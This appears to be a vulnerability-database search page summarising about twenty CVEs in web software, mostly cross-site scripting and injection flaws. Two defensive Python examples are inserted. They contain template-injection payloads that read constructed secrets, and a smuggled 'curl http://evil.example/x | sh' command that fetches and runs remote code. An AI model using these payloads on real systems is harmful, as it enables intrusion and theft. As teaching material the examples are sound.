178 matches found

Positive Technologies
added 2025/01/13 12:00 a.m. · 3 views

PT-2025-1476 · Unknown · Selesta Visual Access Manager

Selesta Visual Access Manager before version 4.42.2 is vulnerable to cross-site scripting (XSS), exploitable via the /common/autocomplete.php file. The vulnerability has been assigned the CVE identifier...

CVSS 6.1 · AI score 5.9 · EPSS 0.00224
Exploits 0 · References 5
OSV
added 2024/12/23 5:23 p.m. · 12 views

CVE-2024-56363 APTRS has an SSTI vulnerability

APTRS (Automated Penetration Testing Reporting System) is a Python and Django-based automated reporting tool designed for penetration testers and security organizations. In version 1.0, there is a vulnerability in the web application's handling of user-supplied input that is incorporated into a Jinja2...

CVSS 7.8 · AI score 7.5 · EPSS 0.00334
Exploits 0 · References 4
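The APTRS entry above describes user-supplied input being incorporated into a Jinja2 template. The block below is an added example, not APTRS code or the advisory's proof of concept. It uses Python's built-in str.format instead of Jinja2 so it runs with the standard library alone; the Report class, its api_key attribute, the module-level SECRET and the function names are all constructed for illustration. The flaw it shows is the same one: user text is treated as the template rather than as data, so template syntax inside it is evaluated against whatever objects the template can reach.

```python
"""Template-injection demo (added example, not APTRS code).

str.format stands in for Jinja2 here so the example needs no third-party
package. The Report object, its api_key attribute and SECRET are constructed
data that a report template can reach; they are not real credentials.
"""

# Constructed module-level value, reachable from any function's __globals__.
SECRET = "constructed-module-secret-42"


class Report:
    """Constructed stand-in for a report object handed to a template."""

    def __init__(self, title: str) -> None:
        self.title = title
        # Constructed secret that the UI never displays but a template can read.
        self.api_key = "constructed-secret-0xDEADBEEF"


def render_vulnerable(user_text: str, report: Report) -> str:
    # BUG: the user's text becomes the template. Every "{...}" field in it is
    # resolved against the object passed to format(), so "{0.api_key}" reads a
    # hidden attribute and "{0.__init__.__globals__[SECRET]}" walks from a
    # bound method to the module namespace.
    return user_text.format(report)


# Developer-controlled template: the only place template syntax is allowed.
TEMPLATE = "Finding for {title}: {body}"


def render_safe(user_text: str, report: Report) -> str:
    # User text is passed as a *value* to a fixed template, so any braces it
    # contains are copied through verbatim and never interpreted.
    return TEMPLATE.format(title=report.title, body=user_text)


if __name__ == "__main__":
    r = Report("Open redirect in /login")
    for payload in ("{0.api_key}", "{0.__init__.__globals__[SECRET]}"):
        print("vulnerable:", render_vulnerable(payload, r))
        print("safe:      ", render_safe(payload, r))
```

The Jinja2 equivalent of the fix is the same: keep the template string under developer control and hand user input to the render context as a variable. Jinja2's SandboxedEnvironment restricts what an attacker-controlled template can reach, but it is a second line of defence, not a substitute for never rendering user text as a template.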
Snyk
added 2024/12/12 7:22 p.m. · 4 views

Cross-site Scripting (XSS)

Overview: Affected versions of this package are vulnerable to cross-site scripting (XSS) through the toHTMLEx method. An attacker can execute arbitrary JavaScript code by injecting malicious input. Details: Cross-site scripting, or XSS, is a code vulnerability that occurs when an attacker "injects" a...

CVSS 6.8 · AI score 5.4 · EPSS 0.00444
Exploits 0 · References 2
Cvelist
added 2024/11/20 12:00 a.m. · 17 views

CVE-2024-51209

Cross-site scripting (XSS) vulnerabilities in Anuj Kumar's Client Management System version 1.2 allow local attackers to inject arbitrary web script or HTML via the search input field parameter on the admin search invoice page and the client search invoice page...

EPSS 0.0026
Exploits 1 · References 2
OSV
added 2024/11/14 3:15 p.m. · 3 views

CVE-2024-11212

A vulnerability classified as critical has been found in SourceCodester Best Employee Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/fetchproductdetails.php. Manipulation of the argument barcode leads to SQL injection. The attack may...

CVSS 8.8 · AI score 6.5 · EPSS 0.00645
Exploits 1 · References 5
Snyk
added 2024/07/11 5:40 p.m. · 3 views

Cross-site Scripting

Overview: org.webjars.bowergithub.jasny:bootstrap is a popular front-end framework for faster and easier web development. Affected versions of this package are vulnerable to cross-site scripting through the data-loading-text attribute in the button component. An attacker can execute arbitrary...

CVSS 6.4 · AI score 5.6 · EPSS 0.00494
Exploits 0 · References 2
Vulnrichment
added 2024/06/26 10:41 p.m. · 16 views

CVE-2024-28984 Hitachi Vantara Pentaho Business Analytics Server - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Hitachi Vantara Pentaho Business Analytics Server prior to versions 10.1.0.0 and 9.3.0.7, including 8.3.x, allows a malicious URL to inject content into the Analyzer plugin interface...

CVSS 8.8 · AI score 6.8 · EPSS 0.00254
Exploits 0 · References 1
NVD
added 2024/06/17 4:15 a.m. · 10 views

CVE-2024-6046

Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority...

Exploits 0
CNNVD
added 2024/04/25 12:00 a.m. · 3 views

Employee Task Management System SQL injection vulnerability

Employee Task Management System is a task management application developed by Carlo Montero, an individual developer. A SQL injection vulnerability exists in Employee Task Management System v1.0 via admin-manage-user.php...

CVSS 8.8 · AI score 8 · EPSS 0.00669
Exploits 1 · References 2
OSV
added 2024/02/16 2:15 a.m. · 5 views

CVE-2024-0038

In injectInputEventToInputFilter of AccessibilityManagerService.java, there is a possible arbitrary input event injection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for...

CVSS 7.8 · AI score 6 · EPSS 0.00133
Exploits 0 · References 2
Prion
added 2024/02/16 2:15 a.m. · 21 views

Input validation

In injectInputEventToInputFilter of AccessibilityManagerService.java, there is a possible arbitrary input event injection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for...

AI score 7.9 · EPSS 0.00133
Exploits 0 · References 2
Positive Technologies
added 2024/02/15 12:00 a.m. · 5 views

PT-2024-15313 · Google · Android

Name of the Vulnerable Software and Affected Versions: Android, affected versions not specified. Description: The issue is related to a missing permission check in the injectInputEventToInputFilter function of AccessibilityManagerService.java. This could lead to arbitrary input event injection,...

CVSS 8.4 · AI score 6.8 · EPSS 0.00133
Exploits 0 · References 7
Positive Technologies
added 2023/12/29 12:00 a.m. · 5 views

PT-2023-31806 · Brainstorm Force · Wp Remote Site Search

Name of the Vulnerable Software and Affected Versions: Brainstorm Force WP Remote Site Search versions 1.0.4 and earlier. Description: The issue is related to Improper Neutralization of Input During Web Page Generation, also known as 'Cross-site Scripting', which allows stored XSS. This means that...

CVSS 6.5 · AI score 6.1 · EPSS 0.00328
Exploits 0 · References 6
OSV
added 2023/09/01 7:15 p.m. · 3 views

DEBIAN-CVE-2023-1523

Using the TIOCLINUX ioctl request, a malicious snap could inject contents into the input of the controlling terminal, which could allow it to cause arbitrary commands to be executed outside of the snap sandbox after the snap exits. Graphical terminal emulators like xterm, gnome-terminal and others...

CVSS 10 · AI score 8.6 · EPSS 0.01447
Exploits 1 · References 1
Packet Storm
added 2023/08/29 12:00 a.m. · 227 views

Foodiee Online Food Ordering Web Application 1.0.0 Cross Site Scripting

Title: Foodiee - Online Food Ordering Web Application V1.0.0 XSS Vulnerability | Author: indoushka | Tested on: Windows 10 Français V.Pro / browser: Mozil...

AI score 7.1
Exploits 0
Github Security Blog
added 2023/08/09 2:41 p.m. · 22 views

ScanCode.io command injection in docker image fetch process

Command injection in the docker fetch process. Summary: A possible command injection in the docker fetch process, as it allows appending malicious commands to the docker_reference parameter. Details: In the function fetch_docker_image in scanpipe/pipes/fetch.py, the parameter docker_reference is user...

CVSS 8.8 · AI score 8 · EPSS 0.02437
Exploits 1 · References 6 · Affected Software 1
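The ScanCode.io entry above describes a user-controlled docker_reference value being appended to a command line. The block below is an added example, not ScanCode.io's code or its fix: the function names, the allow-list grammar for image references, the `docker pull` command line and the sample payload are all assumptions constructed for illustration. It contrasts splicing the reference into a shell string with validating it and passing it as a single argv element, and it never executes anything.

```python
"""Command injection via an image reference (added example, not ScanCode.io
code). The reference grammar, function names and the `docker pull` command
line are assumptions for illustration; no process is spawned by default.
"""
import re
import shlex
import subprocess
from typing import List

# Assumed, deliberately strict subset of the docker reference grammar:
#   [host/]path[/path...][:tag][@sha256:<64 hex>]
# Registry hosts with a port (host:5000/...) are not accepted by this subset.
_REFERENCE_RE = re.compile(
    r"^[a-z0-9]+(?:[._-][a-z0-9]+)*"            # first path component
    r"(?:/[a-z0-9]+(?:[._-][a-z0-9]+)*)*"       # further components
    r"(?::[A-Za-z0-9_][A-Za-z0-9_.-]{0,127})?"  # optional tag
    r"(?:@sha256:[0-9a-f]{64})?$"               # optional digest
)


def build_fetch_command_vulnerable(docker_reference: str) -> str:
    # BUG: the reference is spliced unvalidated into a string that would be
    # handed to subprocess with shell=True, so ';', '|' and '$(...)' inside
    # it are shell syntax rather than part of the image name.
    return f"docker pull {docker_reference}"


def shell_would_see(command: str) -> List[str]:
    # Tokenise with shell punctuation honoured, to show what an injected
    # reference turns into before anything runs. ';' and '|' become their
    # own tokens, exactly as a POSIX shell would treat them.
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def build_fetch_command_safe(docker_reference: str) -> List[str]:
    # Fix 1: reject anything outside the allow-list grammar.
    if not _REFERENCE_RE.match(docker_reference):
        raise ValueError(f"invalid docker reference: {docker_reference!r}")
    # Fix 2: argv list and no shell, so the reference is exactly one
    # argument regardless of its content.
    return ["docker", "pull", docker_reference]


def fetch_docker_image(docker_reference: str, runner=subprocess.run):
    # `runner` is injectable so the path can be exercised without docker.
    argv = build_fetch_command_safe(docker_reference)
    return runner(argv, check=True, capture_output=True, text=True)


if __name__ == "__main__":
    # Constructed payload: a valid-looking tag followed by a command chain.
    payload = "alpine:3.18; curl http://evil.example/x | sh"
    print(shell_would_see(build_fetch_command_vulnerable(payload)))
    try:
        build_fetch_command_safe(payload)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation alone is not enough (a tag that starts with `-` could still be read as an option by the tool being invoked, which is why the tag pattern refuses a leading `-`), and the argv list alone is not enough either, since a valid-looking reference can still point the fetch at an attacker's registry. Both checks together, with the reference logged on rejection, are the pattern to apply.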
RedHat Linux
added 2023/08/03 2:15 p.m. · 4 views

golang: html/template: improper sanitization of CSS values

A flaw was found in golang where angle brackets were not considered dangerous characters when inserted into CSS contexts. Templates containing multiple actions separated by a '/' character could result in the CSS context unexpectedly closing, allowing for the injection of unexpected HTML if...

CVSS 7.3 · AI score 6.6 · EPSS 0.01037
Exploits 0 · References 6
Vulnrichment
added 2023/06/22 12:00 a.m. · 11 views

CVE-2023-31868

Sage X3 version 12.14.0.50-0 is vulnerable to cross-site scripting (XSS). Some parts of the web application are dynamically built from user input, yet that input is neither verified nor filtered by the application to ensure it matches the expected format. Therefore, when HTML/JavaScript code is...

AI score 6.8 · EPSS 0.00352
Exploits 0 · References 2
Cvelist
added 2023/05/09 1:35 a.m. · 21 views

CVE-2023-30743 Improper Neutralization of Input in SAPUI5

Due to improper neutralization of input in SAPUI5 - versions SAPUI 750, SAPUI 754, SAPUI 755, SAPUI 756, SAPUI 757, UI700 200 - the sap.m.FormattedText SAPUI5 control allows injection of untrusted CSS. This blocks the user's interaction with the application. Further, in the absence of URL validation by th...

CVSS 7.1 · AI score 7.1 · EPSS 0.00438
Exploits 0 · References 2
CVE
added 2023/03/24 7:31 a.m. · 50 views

CVE-2023-1616

CVE-2023-1616 affects XiaoBingBy TeaCMS up to version 2.0.2, specifically the Article Title Handler component. The issue is a cross-site scripting vulnerability triggered by manipulated article-title input, and it is remotely exploitable. A public exploit is noted, and multiple sources confirm the vuln...

CVSS 5.4 · AI score 4.4 · EPSS 0.00475
Exploits 1 · References 3 · Affected Software 1